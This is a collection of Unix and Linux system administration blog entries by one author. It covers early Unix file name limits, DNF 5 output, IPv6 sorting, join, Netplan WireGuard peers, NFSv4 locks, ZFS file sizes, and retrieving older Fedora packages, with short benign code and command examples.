The length of file names in early Unix

By: cks

If you use Unix today, you can enjoy relatively long file names on more or less any filesystem that you care to name. But it wasn't always this way. Research V7 had 14-byte filenames, and the System III/System V lineage continued this restriction until it merged with BSD Unix, which had significantly increased this limit as part of moving to a new filesystem (initially called the 'Fast File System', for good reasons). You might wonder where this unusual number came from, and for that matter, what the file name limit was on very early Unixes (it was 8 bytes, which surprised me; I vaguely assumed that it had been 14 from the start).

I've mentioned before that the early versions of Unix had a quite simple format for directory entries. In V7, we can find the directory structure specified in sys/dir.h (dir(5) helpfully directs you to sys/dir.h), which is so short that I will quote it in full:

#ifndef	DIRSIZ
#define	DIRSIZ	14
#endif
struct	direct
{
    ino_t    d_ino;
    char     d_name[DIRSIZ];
};

To fill in the last blank, ino_t was a 16-bit (two-byte) unsigned integer (and field alignment on PDP-11s meant that this structure required no padding), for a total of 16 bytes. This directory structure goes back to V4 Unix. In V3 Unix and before, directory entries were only ten bytes long, with 8-byte file names.

(Unix V4 (the Fourth Edition) was when the kernel was rewritten in C, so that may have been considered a good time to make this change. I do have to wonder how they handled the move from the old directory format to the new one, since Unix at this time didn't have multiple filesystem types inside the kernel; you just had the filesystem, plus all of your user tools knew the directory structure.)

One benefit of the change in filename size is that 16-byte directory entries fit evenly into 512-byte disk blocks (or other power-of-two buffer sizes). You never have a directory entry that spans two disk blocks, so you can deal with directories a block at a time. Ten-byte directory entries don't have this property; eight-byte ones would, but that would leave space for only six-character file names, and presumably that was considered too small even in Unix V1.
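To make the arithmetic concrete, here is a small Python sketch (mine, not anything from V7) that unpacks one 512-byte directory block in the V7 format; it assumes the PDP-11's little-endian byte order and the V7 convention that an inode number of 0 marks an unused entry.

import struct

# A V7 directory entry: a 16-bit inode number plus a 14-byte name,
# 16 bytes in all, so exactly 32 entries fit in a 512-byte block.
V7_DIRENT = struct.Struct("<H14s")
assert V7_DIRENT.size == 16 and 512 % V7_DIRENT.size == 0

def v7_dirents(block):
    # Yield (inode, name) pairs from one 512-byte directory block.
    for ino, rawname in V7_DIRENT.iter_unpack(block[:512]):
        if ino == 0:
            continue  # an inode of 0 marks a deleted or unused slot
        yield ino, rawname.rstrip(b"\0").decode("ascii")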

PS: That inode numbers in V7 (and earlier) were 16-bit unsigned integers does mean what you think it means; there could only be at most 65,536 inodes in a single classical V7 filesystem. If you needed more files, you had better make more filesystems. Early Unix had a lot of low limits like that, some of them quite hard-coded.

Fedora's DNF 5 and the curse of mandatory too-smart output

By: cks

DNF is Fedora's high(er) level package management system, which pretty much any system administrator is going to have to use to install and upgrade packages. Fedora 41 and later have switched from DNF 4 to DNF 5 as their normal (and probably almost mandatory) version of DNF. I ran into some problems with this switch, and since then I've found other issues, all of which boil down to a simple issue: DNF 5 insists on doing too-smart output.

Regardless of what you set your $TERM to and what else you do, if DNF 5 is connected to a terminal (and perhaps if it isn't), it will pretty-print its output in an assortment of ways. As far as I can tell it simply assumes ANSI cursor addressability, among other things, and will always fit its output to the width of your terminal window, truncating output as necessary. This includes output from RPM package scripts that are running as part of the update. Did one of them print a line longer than your current terminal width? Tough, it was probably truncated. Are you using script so that you can capture and review all of the output from DNF and RPM package scripts? Again, tough, you can't turn off the progress bars and other things that will make a complete mess of the typescript.

(It's possible that you can find the information you want in /var/log/dnf5.log in un-truncated and readable form, but if so it's buried in debug output and I'm not sure I trust dnf5.log in general.)

DNF 5 is far from the only offender these days. An increasing number of command line programs simply assume that they should always produce 'smart' output (ideally only if they're connected to a terminal). They have no command line option to turn this off, and since they always use 'ANSI' escape sequences, they ignore the tradition of '$TERM' and especially 'TERM=dumb' to turn that off. Some of them can specifically disable colour output (typically with one of a number of environment variables, which may or may not be documented, and sometimes with a command line option), but that's usually the limit of their willingness to stop doing things. The idea of printing one whole line at a time as you go, with no progress bars, no interleaved output, and so on, has increasingly become a non-starter for modern command line tools.
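For contrast, here is an illustrative Python sketch (my own, not taken from any particular tool) of the traditional checks that these programs skip; $NO_COLOR is one of the semi-documented environment variables mentioned above.

import os, sys

def want_smart_output(stream=sys.stdout):
    # The traditional tests before producing 'smart' terminal output.
    if not stream.isatty():
        return False  # output is redirected to a file or a pipe
    if os.environ.get("TERM", "dumb") == "dumb":
        return False  # the terminal can't handle escape sequences
    if "NO_COLOR" in os.environ:
        return False  # informal convention for disabling colours
    return True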

(Another semi-offender is Debian's 'apt' and also 'apt-get' to some extent, although apt-get's progress bars can be turned off and 'apt' is explicitly a more user friendly front end to apt-get and friends.)

PS: I can't run DNF with its output directed into a file because it wants you to interact with it to approve things, and I don't feel like letting it run freely without that.

The lack of a good command line way to sort IPv6 addresses

By: cks

A few years ago, I wrote about how 'sort -V' can sort IPv4 addresses into their natural order for you. Even back then I was smart enough to put in that 'IPv4' qualification and note that this didn't work with IPv6 addresses, and said that I didn't know of any way to handle IPv6 addresses with existing command line tools. As far as I know, that remains the case today, although you can probably build a Perl, Python, or other language program that does such sorting for you if you need to do this regularly.

Unix tools like 'sort' are pretty flexible, so you might innocently wonder why it can't be coerced into sorting IPv6 addresses. The first problem is that IPv6 addresses are written in hex without leading 0s, not decimal. Conventional sort will correctly sort hex numbers if all of the numbers are the same length, but IPv6 addresses are written in hex groups that conventionally drop leading zeros, so you will have 'ff' instead of '00ff' in common output (or '0' instead of '0000'). The second and bigger problem is the IPv6 '::' notation, which stands for the longest run of all-zero fields, ie some number of '0000' fields.

(I'm ignoring IPv6 scopes and zones for this, let's assume we have public IPv6 addresses.)

If IPv6 addresses were written out in full, with leading 0s on fields and all their 0000 fields, you could handle them with a simple conventional sort (you wouldn't even need to tell sort that the field separator was ':'). Unfortunately they almost never are, so you need to either transform them to that form, print them out, sort the output, and perhaps transform them back, or read them into a program as 128-bit numbers, sort the numbers, and print them back out as IPv6 addresses. Ideally your language of choice for this has a way to sort a collection of IPv6 addresses.

The very determined can probably do this with awk with enough work (people have done amazing things in awk). But my feeling is that doing this in conventional Unix command line tools is a Turing tarpit; you might as well use a language where there's a type of IPv6 addresses that exposes the functionality that you need.
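To illustrate that last point, here is a small Python filter (a sketch of mine, not a standard tool) that sorts addresses read on standard input; the standard ipaddress module copes with both the dropped leading zeros and the '::' notation, and its '.exploded' attribute produces the written-out full form if you would rather generate that for GNU Sort.

#!/usr/bin/env python3
import ipaddress, sys

# Read one IP address per line and print them in their natural order.
addrs = [ipaddress.ip_address(l.strip()) for l in sys.stdin if l.strip()]
# Sorting on (version, numeric value) also copes with mixed IPv4/IPv6 input.
for a in sorted(addrs, key=lambda a: (a.version, int(a))):
    print(a)  # print(a.exploded) would print the full form instead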

(And because IPv6 addresses are so complex, I suspect that GNU Sort will never support them directly. If you need GNU Sort to deal with them, the best option is a program that turns them into their full form.)

PS: People have probably written programs to sort IPv6 addresses, but with the state of the Internet today, the challenge is finding them.

Some notes on using 'join' to supplement one file with data from another

By: cks

Recently I said something vaguely grumpy about the venerable Unix 'join' tool. As the POSIX specification page for join will unhelpfully tell you, join is a 'relational database operator', which means that it implements the rough equivalent of SQL joins. One way to use join is to add additional information for some lines in your input data.

Suppose, not entirely hypothetically, that we have an input file (or data stream) that starts with a login name and contains some additional information, and that for some logins (but not all of them) we have useful additional data about them in another file. Using join, the simple case of this is easy, if the 'master' and 'suppl' files are already sorted:

join -1 1 -2 1 -a 1 master suppl

(I'm sticking to POSIX syntax here. Some versions of join accept '-j 1' as an alternative to '-1 1 -2 1'.)

Our specific options tell join to join each line of 'master' and 'suppl' on the first field in each (the login) and print them, and also to print all of the lines from 'master' that didn't have a login in 'suppl' (that's the '-a 1' argument). For lines with matching logins, we get all of the fields from 'master' and then all of the extra fields from 'suppl'; for lines from 'master' that don't match, we just get the fields from 'master'. Generally you can tell which lines were supplemented and which weren't by how many fields they have.

If we want something other than all of the fields in the order that they are in the existing data source, in theory we have the '-o <list>' option to tell join what fields from each source to output. However, this option has a little problem, which I will show you by quoting the important bit from the POSIX standard (emphasis mine):

The fields specified by list shall be written for all selected output lines. Fields selected by list that do not appear in the input shall be treated as empty output fields.

What that means is that if we're also printing non-joined lines from our 'master' file, our '-o' still applies and any fields we specified from 'suppl' will be blank and empty (unless you use '-e'). This can be inconvenient if you were re-ordering fields so that, for example, a field from 'suppl' was listed before some fields from 'master'. It also means that you want to use '1.1' to get the login from 'master', which is always going to be there, not '2.1', the login from 'suppl', which is only there some of the time.

(All of this assumes that your supplementary file is listed second and the master file first.)

On the other hand, using '-e' we can simplify life in some situations. Suppose that 'suppl' contains only one additional interesting piece of information, and it has a default value that you'll use if 'suppl' doesn't contain a line for the login. Then if 'master' has three fields and 'suppl' two, we can write:

join -1 1 -2 1 -a 1 -e "$DEFVALUE" -o '1.1,1.2,1.3,2.2' master suppl

Now we don't have to try to tell whether or not a line from 'master' was supplemented by counting how many fields it has; everything has the same number of fields, it's just sometimes the last (supplementary) field is the default value.
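Here is a tiny illustration with made-up data, using '(none)' as the default value; note that both files are sorted on their first field:

; cat master
ava 100 staff
bob 200 admin
cks 300 staff
; cat suppl
ava toronto
cks waterloo
; join -1 1 -2 1 -a 1 -e '(none)' -o '1.1,1.2,1.3,2.2' master suppl
ava 100 staff toronto
bob 200 admin (none)
cks 300 staff waterloo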

(This is harder to apply if you have multiple fields from the 'suppl' file, but possibly you can find a 'there is nothing here' value that works for the rest of your processing.)

Netplan can only have WireGuard peers in one file

By: cks

We have started using WireGuard to build a small mesh network so that machines outside of our network can securely get at some services inside it (for example, to send syslog entries to our central syslog server). Since this is all on Ubuntu, we set it up through Netplan, which works but which I said 'has warts' in my first entry about it. Today I discovered another wart due to what I'll call the WireGuard provisioning problem:

Current status: provisioning WireGuard endpoints is exhausting, at least in Ubuntu 22.04 and 24.04 with netplan. So many netplan files to update. I wonder if Netplan will accept files that just define a single peer for a WG network, but I suspect not.

The core WireGuard provisioning problem is that when you add a new WireGuard peer, you have to tell all of the other peers about it (or at least all of the other peers you want to be able to talk to the new peer). When you're using Netplan, it would be convenient if you could put each peer in a separate file in /etc/netplan; then when you add a new peer, you just propagate the new Netplan file for the peer to everything (and do the special Netplan dance required to update peers).

(Apparently I should now call it 'Canonical Netplan', as that's what its front page calls it. At least that makes it clear exactly who is responsible for Netplan's state and how it's not going to be widely used.)

Unfortunately this doesn't work, and it fails in a dangerous way, which is that Netplan only notices one set of WireGuard peers, in one netplan file (at least on servers, using systemd-networkd as the backend). If you put each peer in its own file, only the first peer is picked up. If you define some peers in the file where you define your WireGuard private key, local address, and so on, and some peers in another file, only the peers from whichever file comes first will be used (even if the first file only defines peers, which isn't enough to bring up a WireGuard device by itself). As far as I can see, Netplan doesn't report any errors or warnings to the system logs on boot about this situation; instead, you silently get an incomplete WireGuard configuration.

This is visibly and clearly a Netplan issue, because on servers you can inspect the systemd-networkd files written by Netplan (in /run/systemd/network). When I do this, the WireGuard .netdev file has only the peers from one file defined in it (and the .netdev file matches the state of the WireGuard interface). This is especially striking when the netplan file with the private key and listening port (and some peers) is second; since the .netdev file contains the private key and so on, Netplan is clearly merging data from more than one netplan file, not completely ignoring everything except the first one. It's just ignoring any peers encountered after the first set of them.

My overall conclusion is that in Netplan, you need to put all configuration for a given WireGuard interface into a single file, however tempting it might be to try splitting it up (for example, to put core WireGuard configuration stuff in one file and then list all peers in another one).
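For what it's worth, the shape of such a single file is something like the following sketch (with made-up addresses and keys, following Netplan's documented WireGuard tunnel syntax):

network:
  version: 2
  tunnels:
    wg0:
      mode: wireguard
      port: 51820
      keys:
        private: <this machine's private key>
      addresses: [192.0.2.10/24]
      peers:
        # every peer has to be listed here, in this one file
        - keys:
            public: <first peer's public key>
          allowed-ips: [192.0.2.1/32]
          endpoint: vpngw.example.org:51820
        - keys:
            public: <second peer's public key>
          allowed-ips: [192.0.2.2/32]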

I don't know if this is an already filed Netplan bug and I don't plan on bothering to file one for it, partly because I don't expect Canonical to fix Netplan issues any more than I expect them to fix anything else and partly for other reasons.

PS: I'm aware that we could build a system to generate the Netplan WireGuard file, or maybe find a YAML manipulating program that could insert and delete blocks that matched some criteria. I'm not interested in building yet another bespoke custom system to deal with what is (for us) a minor problem, since we don't expect to be constantly deploying or removing WireGuard peers.

These days, Linux audio seems to just work (at least for me)

By: cks

For a long time, the common perception was that 'Linux audio' was the punchline for a not particularly funny joke. I sort of shared that belief; although audio had basically worked for me for a long time, I had a simple configuration and dreaded having to make more complex audio work in my unusual desktop environment. But these days, audio seems to just work for me, even in systems that have somewhat complex audio options.

On my office desktop, I've wound up with three potential audio outputs and two audio inputs: the motherboard's standard sound system, a USB headset with a microphone that I use for online meetings, the microphone on my USB webcam, and (to my surprise) an HDMI audio output, because my LCD displays do in fact have tiny little speakers built in. In PulseAudio (or whatever is emulating it today), I have the program I use for online meetings set to use the USB headset, and everything else plays sound through the motherboard's sound system (which I have basic desktop speakers plugged into). All of this works sufficiently seamlessly that I don't think about it, although I do keep a script around to reset the default audio destination.

On my home desktop, for a long time I had a simple single-output audio system that played through the motherboard's sound system (plus a microphone on a USB webcam that was mostly not connected). Recently I got an outboard USB DAC and, contrary to my fears, it basically plugged in and just worked. It was easy to set the USB DAC as the default output in pavucontrol and all of the settings related to it stick around even when I put it to sleep overnight and it drops off the USB bus. I was quite pleased by how painless the USB DAC was to get working, since I'd been expecting much more hassles.

(Normally I wouldn't bother meticulously switching the USB DAC to standby mode when I'm not using it for an extended time, but I noticed that the case is clearly cooler when it rests in standby mode.)

This is still a relatively simple audio configuration because it's basically static. I can imagine more complex ones, where you have audio outputs that aren't always present and that you want some programs (or more generally audio sources) to use when they are present, perhaps even with priorities. I don't know if the Linux audio systems that Linux distributions are using these days could cope with that, or if they did would give you any easy way to configure it.

(I'm aware that PulseAudio and so on can be fearsomely complex under the hood. As far as the current actual audio system goes, I believe that what my Fedora 41 machines are using for audio is PipeWire (also) with WirePlumber, based on what processes seem to be running. I think this is the current Fedora 41 audio configuration in general, but I'm not sure.)

The appeal of keyboard launchers for (Unix) desktops

By: cks

A keyboard launcher is a big part of my (modern) desktop, but over on the Fediverse I recently said something about them in general:

I don't necessarily suggest that people use dmenu or some equivalent. Keyboard launchers in GUI desktops are an acquired taste and you need to do a bunch of setup and infrastructure work before they really shine. But if you like driving things by the keyboard and will write scripts, dmenu or equivalents can be awesome.

The basic job of a pure keyboard launcher is to let you hit a key, start typing, and then select and do 'something'. Generally the keyboard launcher will make a window appear so that you can see what you're typing and maybe what you could complete it to or select.

The simplest and generally easiest way to use a keyboard launcher, and how many of them come configured to work, is to use it to select and run programs. You can find a version of this idea in GNOME, and even Windows has a pseudo-launcher in that you can hit a key to pop up the Start menu and the modern Start menu lets you type in stuff to search your programs (and other things). One problem with the GNOME version, and many basic versions, is that in practice you don't necessarily launch desktop programs all that often or launch very many different ones, so you can have easier ways to invoke the ones you care about. One problem with the Windows version (at least in my experience) is that it will do too much, which is to say that no matter what garbage you type into it by accident, it will do something with that garbage (such as launching a web search).

The happy spot for a keyboard launcher is somewhere in the middle, where it does a variety of things that are useful for you, but not without limits. The best keyboard launcher for your desktop is one that gives you fast access to whatever things you do a lot, ideally with completion so you type as little as possible. When you have it tuned up and working smoothly the feel is magical; I tap a key, type a couple of characters, hit tab, hit return, and the right thing happens without me thinking about it, all fast enough that I can and do type ahead blindly (which then goes wrong if the keyboard launcher doesn't start fast enough).

The problem with keyboard launchers, and why they're not for everyone, is that everyone has a different set of things that they do a lot and that are useful for them to trigger entirely through the keyboard. No keyboard launcher will come precisely set up for what you do a lot in their default installation, so at a minimum you need to spend the time and effort to curate what the launcher will do and how it does it. If you're more ambitious, you may need to build supporting scripts that give the launcher a list of things to complete and then act on them when you complete one. If you don't curate the launcher and throw in the kitchen sink, you wind up with the Windows experience where it will certainly do something when you type things but perhaps not really what you wanted.

(For example, I routinely ssh to a lot of our machines, so my particular keyboard launcher setup lets me type a machine name (with completion) to start a session to it. But I had to build all of that, including sourcing the machine names I wanted included from somewhere, and this isn't necessarily useful for people who aren't constantly ssh'ing to machines.)
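As a sketch of what this sort of glue can look like (with a made-up host list and terminal command; a real setup would source hosts from somewhere and be more involved), a dmenu 'ssh somewhere' helper only takes a few lines of Python:

#!/usr/bin/env python3
import subprocess

# The hosts you ssh to a lot; in real life, generated from some inventory.
hosts = ["apps0", "mailswitch", "sanserv1", "webfe2"]
# dmenu reads candidates on stdin and prints the selection on stdout.
pick = subprocess.run(["dmenu", "-p", "ssh:"], input="\n".join(hosts),
                      capture_output=True, text=True).stdout.strip()
if pick:
    subprocess.run(["xterm", "-e", "ssh", pick])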

There are a variety of keyboard launchers for both X and Wayland, basically none of which I have any experience with. See the Arch Wiki section on application launchers. Someday I will have to get a Wayland equivalent to my particular modified dmenu, a thought that fills me with no more enthusiasm than any other part of replacing my whole X environment.

PS: Another issue with keyboard launchers is that sometimes you're wrong about what you want to do with them. I once built an entire keyboard launcher setup to select terminal windows and then later wound up abandoning it when I didn't use it enough.

My Cinnamon desktop customizations (as of 2025)

By: cks

A long time ago I wrote up some basic customizations of Cinnamon, shortly after I started using Cinnamon (also) on my laptop of the time. Since then, the laptop got replaced with another one and various things changed in both the land of Cinnamon and my customizations (eg, also). Today I feel like writing down a general outline of my current customizations, which fall into a number of areas from the modest but visible to the large but invisible.

The large but invisible category is that just like on my main fvwm-based desktop environment, I use xcape (plus a custom Cinnamon key binding for a weird key combination) to invoke my custom dmenu setup (1, 2) when I tap the CapsLock key. I have dmenu set to come up horizontally on the top of the display, which Cinnamon conveniently leaves alone in the default setup (it has its bar at the bottom). And of course I make CapsLock into an additional Control key when held.

(On the laptop I'm using a very old method of doing this. On more modern Cinnamon setups in virtual machines, I do this with Settings → Keyboard → Layout → Options, and then in the CapsLock section set CapsLock to be an additional Ctrl key.)

To start xcape up and do some other things, like load X resources, I have a personal entry in Settings → Startup Applications that runs a script in my ~/bin/X11. I could probably do this in a more modern way with an assortment of .desktop files in ~/.config/autostart (which is where my 'Startup Applications' entries actually wind up) that run each thing individually, or perhaps with some systemd user units. But the current approach works and is easy to modify if I want to add or remove things (I can just edit the script).

I have a number of Cinnamon 'applets' installed on my laptop and my other Cinnamon VM setups. The ones I have everywhere are Spices Update and Shutdown Applet, the latter because if I tell the (virtual) machine to log me off, shut down, or restart, I generally don't want to be nagged about it. On my laptop I also have CPU Frequency Applet (set to only display a summary) and CPU Temperature Indicator, for no compelling reason. In all environments I also pin launchers for Firefox and (Gnome) Terminal to the Cinnamon bottom bar, because I start both of them often enough. I position the Shutdown Applet on the left side, next to the launchers, because I think of it as a peculiar 'launcher' instead of an applet (on the right).

(The default Cinnamon keybindings also start a terminal with Ctrl + Alt + T, which you can still find through the same process from several years ago provided that you don't cleverly put something in .local/share/glib-2.0/schemas and then run 'glib-compile-schemas .' in that directory. If I was a smarter bear, I'd understand what I should have done when I was experimenting with something.)

On my virtual machines with Cinnamon, I don't bother with the whole xcape and dmenu framework, but I do set up the applets and the launchers and fix CapsLock.

(This entry was sort of inspired by someone I know who just became a Linux desktop user (after being a long time terminal user).)

Sidebar: My Cinnamon 'window manager' custom keybindings

I have these (on my laptop) and perpetually forget about them, so I'm going to write them down now so perhaps that will change.

move-to-corner-ne=['<Alt><Super>Right']
move-to-corner-nw=['<Alt><Super>Left']
move-to-corner-se=['<Primary><Alt><Super>Right']
move-to-corner-sw=['<Primary><Alt><Super>Left']
move-to-side-e=['<Shift><Alt><Super>Right']
move-to-side-n=['<Shift><Alt><Super>Up']
move-to-side-s=['<Shift><Alt><Super>Down']
move-to-side-w=['<Shift><Alt><Super>Left']

I have some other keybindings on the laptop but they're even less important, especially once I added dmenu.

Looking at what NFSv4 clients have locked on a Linux NFS(v4) server

By: cks

A while ago I wrote an entry about (not) finding which NFSv4 client owns a lock on a Linux NFS(v4) server, where the best I could do was pick awkwardly through the raw NFS v4 client information in /proc/fs/nfsd/clients. Recently I discovered an alternative to doing this by hand, which is the nfsdclnts program, and as a result of digging into it and what I was seeing when I tried it out, I now believe I have a better understanding of the entire situation (which was previously somewhat confusing).

The basic thing that nfsdclnts will do is list 'locks' and some information about them with 'nfsdclnts -t lock', in addition to listing other state information such as 'open', for open files, and 'deleg', for NFS v4 delegations. The information it lists is somewhat limited, for example it will list the inode number but not the filesystem, but on the good side nfsdclnts is a Python program so you can easily modify it to report any extra information that exists in the clients/#/states files. However, this information about locks is not complete, because of how file level locks appear to normally manifest in NFS v4 client state.

(The information in the states files is limited, although it contains somewhat more than nfsdclnts shows.)

Here is how I understand NFS v4 locking and states. To start with, NFS v4 has a feature called delegations, where the NFS v4 server can hand a lot of authority over a file to a NFS v4 client. When a NFS v4 client accesses a file, the NFS v4 server likes to give it a delegation if this is possible; it normally will be if no one else has the file open or active. Once a NFS v4 client holds a delegation, it can lock the file without involving the NFS v4 server. At this point, the client's 'states' file will report an opaque 'type: deleg' entry for the file (this entry may or may not have a filename; without one, nfsdclnts reports it as a 'disconnected dentry').

While a NFS v4 client has the file delegated, if any other NFS v4 client does anything with the file, including simply opening it, the NFS v4 server will recall the delegation from the original client. As a result, the original client now has to tell the NFS v4 server that it has the file locked. At this point a 'type: lock' entry for the file appears in the first NFS v4 client's states file. If the first NFS v4 client releases its lock while the second NFS v4 client is trying to acquire it, the second NFS v4 client will not have a delegation for the file, so its lock will show up as an explicit 'type: lock' entry in its states file.

An additional wrinkle is that a NFS v4 client holding a delegation doesn't immediately release it once all processes have released their locks, closed the file, and so on. Instead the delegation may linger on for some time. If another NFS v4 client opens the file during this time, the first client will lose the delegation, but the second NFS v4 client may not get a delegation from the NFS v4 server, so its lock will show up as a 'type: lock' states file entry.

A third wrinkle is that multiple clients may hold read-only delegations for a file and have fcntl() read locks on it at once, with each of them having a 'type: deleg, access: r' entry for it in their states files. These will only become visible 'type: lock' states entries if the clients have to release their delegations.

So putting this all together:

  • If there is a 'type: lock' entry for the file in any states file (or it's listed in 'nfsdclnts -t lock'), the file is definitely locked by whoever has that entry.

  • If there are no 'type: deleg' or 'type: lock' entries for the file, it's definitely not locked; you can also see this by whether nfsdclnts lists it as having delegations or locks.

  • If there are 'type: deleg' entries for the file, it may or may not be locked by the NFS v4 client (or clients) with the delegation. If the delegation is an 'access: w' delegation, you can see if someone actually has the file locked by accessing the file on another NFS v4 client, which will force the NFS v4 server to recall the delegation and expose the lock if there is one.

If the delegation is 'access: r' and might have multiple read-only locks, you can't force the NFS v4 server to recall the delegation by merely opening the file read-only (for example with 'cat file' or 'less file'). Instead the server will only recall the delegation if you open the file read-write. A convenient way to do this is probably to use 'flock -x <file> -c /bin/true', although this does require you to have more permissions for the file than simply the ability to read it.
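If you want to poke at this yourself without nfsdclnts, a crude version of its lock listing is easy to sketch in Python (this just string-matches the states files, so treat it as purely illustrative):

#!/usr/bin/env python3
from pathlib import Path

# Report every 'type: lock' state entry, by NFS v4 client.
for states in Path("/proc/fs/nfsd/clients").glob("*/states"):
    for line in states.read_text().splitlines():
        if "type: lock" in line:
            print("client %s: %s" % (states.parent.name, line.strip()))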

Sidebar: Disabling NFS v4 delegations on the server

Based on trawling various places, I believe this is done by writing a '0' to /proc/sys/fs/leases-enable (the 'fs.leases-enable' sysctl) and then apparently restarting your NFS v4 server processes. This will disable all user level uses of fcntl()'s F_SETLEASE and F_GETLEASE as an additional effect, and I don't know if this will affect any important programs running on the NFS server itself. Based on a study of the kernel source code, I believe that you don't need to restart your NFS v4 server processes if it's sufficient for the NFS server to stop handing out new delegations while current delegations stay around until they're dropped.

(There have apparently been some NFS v4 server and client issues with delegations, cf, along with other NFS v4 issues. However, I don't know if the cure winds up being worse than the disease here, or if there's another way to deal with these stateid problems.)

Unix files have (at least) two sizes

By: cks

I'll start by presenting things in illustrated form:

; ls -l testfile
-rw-r--r-- 1 cks 262144 Apr 13 22:03 testfile
; ls -s testfile
1 testfile
; ls -slh testfile
512 -rw-r--r-- 1 cks 256K Apr 13 22:03 testfile

The two well known sizes that Unix files have are the logical 'size' in bytes and what stat.h describes as "the number of blocks allocated for this object", often converted to some number of bytes (as ls is doing here in the last command). A file's size in bytes is roughly speaking the last file offset that has been written to in the file, and not all of the bytes covered by it may have actually been written; when this is the case, the result is a sparse file. Sparse files are the traditional cause of a mismatch between the byte size and the number of blocks a file uses. However, that is not what is happening here.

This file is on a ZFS filesystem with ZFS's compression turned on, and it was created with 'dd if=/dev/zero of=testfile bs=1k count=256'. In ZFS, zeroes compress extremely well, and so ZFS has written basically no physical data blocks and faithfully reported that (minimal) number in the stat() st_blocks field. However, at the POSIX level we have indeed written data to all 256 KBytes of the file; it's not a sparse file. This is an extreme example of filesystem compression, and there are plenty of lesser ones.

This leaves us with a third size, which is the number of logical blocks for this file. When a filesystem is doing data compression, this number will be different from the number of physical blocks used. As far as I can tell, the POSIX stat.h description doesn't specify which one you have to report for st_blocks. As we can see, ZFS opts to report the physical block size of the file, which is probably the more useful number for the purposes of things like 'du'. However, it does leave us with no way of finding out the logical block size, which we may care about for various reasons (for example, if our backup system can skip unwritten sparse blocks but always writes out uncompressed blocks).
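Both numbers come straight out of stat(), so comparing them is trivial in most languages. Here is an illustrative Python version; on Linux, st_blocks is counted in 512-byte units regardless of the filesystem's actual block size:

#!/usr/bin/env python3
import os, sys

st = os.stat(sys.argv[1])
allocated = st.st_blocks * 512  # st_blocks is in 512-byte units on Linux
print("byte size:", st.st_size, " allocated bytes:", allocated)
if allocated < st.st_size:
    print("sparse and/or compressed (less space used than the byte size)")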

This also implies that a non-sparse file can change its st_blocks number if you move it from one filesystem to another. One filesystem might have compression on and the other one have it off, or they might have different compression algorithms that give different results. In some cases this will cause the file's space usage to expand so that it doesn't actually fit into the new filesystem (or for a tree of files to expand their space usage).

(I don't know if there are any Unix filesystems that report the logical block size in st_blocks and only report the physical block size through a private filesystem API, if they report it at all.)

One way to set up local programs in a multi-architecture Unix environment

By: cks

Back in the old days, it used to be reasonably routine to have 'multi-architecture' Unix environments with shared files (where here architecture was a combination of the process architecture and the Unix variant). The multi-architecture days have faded out, and with them fading, so has information about how people made this work with things like local binaries.

In the modern era of large local disks and build farms, the default approach is probably to simply build complete copies of '/local' for each architecture type and then distribute the result around somehow. In the old days people were a lot more interested in reducing disk space by sharing common elements and then doing things like NFS-mounting your entire '/local', which made life more tricky. There likely were many solutions to this, but the one I learned at the university as a young sprout worked like the following.

The canonical paths everyone used and had in their $PATH were things like /local/bin, /local/lib, /local/man, and /local/share. However, you didn't (NFS) mount /local; instead, you NFS mounted /local/mnt (which was sort of an arbitrary name, as we'll see). In /local/mnt there were 'share' and 'man' directories, and also a per-architecture directory for every architecture you supported, with names like 'solaris-sparc' or 'solaris-x86'. These per-architecture directories contained 'bin', 'lib', 'sbin', and so on subdirectories.

(These directories contained all of the locally installed programs, all jumbled together, which did have certain drawbacks that became more and more apparent as you added more programs.)

Each machine had a /local directory on its root filesystem that contained /local/mnt, symlinks from /local/share and /local/man to 'mnt/share' and 'mnt/man', and then symlinks for the rest of the directories that went to 'mnt/<arch>/bin' (or sbin or lib). Then everyone mounted /local/mnt on, well, /local/mnt. Since /local and its contents were local to the machine, you could have different symlinks on each machine that used the appropriate architecture (and you could even have built them on boot if you really wanted to, although in practice they were created when the machine was installed).
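Put together, a Solaris SPARC machine in this scheme wound up with a /local that looked roughly like this:

/local/mnt          the NFS mount point
/local/share   ->   mnt/share               (architecture independent)
/local/man     ->   mnt/man
/local/bin     ->   mnt/solaris-sparc/bin   (per-architecture)
/local/lib     ->   mnt/solaris-sparc/lib
/local/sbin    ->   mnt/solaris-sparc/sbin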

When you built software for this environment, you told it that its prefix was /local, and let it install itself (on a suitable build server) using /local/bin, /local/lib, /local/share and so on as the canonical paths. You had to build (and install) software repeatedly, once for each architecture, and it was on the software (and you) to make sure that /local/share/<whatever> was in fact the same from architecture to architecture. System administrators used to get grumpy when people accidentally put architecture dependent things in their 'share' areas, but generally software was pretty good about this in the days when it mattered.

(In some variants of this scheme, the mount points were a bit different because the shared stuff came from one NFS server and the architecture dependent parts from another, or might even be local if your machine was the only instance of its particular architecture.)

There were much more complicated schemes that various places did (often universities), including ones that put each separate program or software system into its own directory tree and then glued things together in various ways. Interested parties can go through LISA proceedings from the 1980s and early 1990s.

Getting older, now-replaced Fedora package updates

By: cks

Over the history of a given Fedora version, Fedora will often release multiple updates to the same package (for example, kernels, but there are many others). When it does this, the older packages wind up being removed from the updates repository and are no longer readily available through mechanisms like 'dnf list --showduplicates <package>'. For a long time I used dnf's 'local' plugin to maintain a local archive of all packages I'd updated, so I could easily revert, but it turns out that as of Fedora 41's change to dnf5 (dnf version 5), that plugin is not available (presumably it hasn't been ported to dnf5, and may never be). So I decided to look into my other options for retrieving and installing older versions of packages, in case the most recent version has a bug that affects me (which has happened).

Before I take everyone on a long yak-shaving expedition, the simplest and best answer is to install the 'fedora-repos-archive' package, which installs an additional Fedora repository that has those replaced updates. After installing it, I suggest that you edit /etc/yum.repos.d/fedora-updates-archive.repo to disable it by default, which will save you time, bandwidth, and possibly aggravation. Then when you really want to see all possible versions of, say, Rust, you can do:

dnf list --showduplicates --enablerepo=updates-archive rust

You can then use 'dnf downgrade ...' as appropriate.

(Like the other Fedora repositories, updates-archive automatically knows your release version and picks packages from it. I think you can change this a bit with '--releasever=<NN>', but I'm not sure how deep the archive is.)

The other approach is to use Fedora Bodhi (also) and Fedora Koji (also) to fetch the packages for older builds, in much the same way as you can use Bodhi (and Koji) to fetch new builds that aren't in the updates or updates-testing repository yet. To start with, we're going to need to find out what's available. I think this can be done through either Bodhi or Koji, although Koji is presumably more authoritative. Let's do this for Rust in Fedora 41:

bodhi updates query --packages rust --releases f41
koji list-builds --state COMPLETE --no-draft --package rust --pattern '*.fc41'

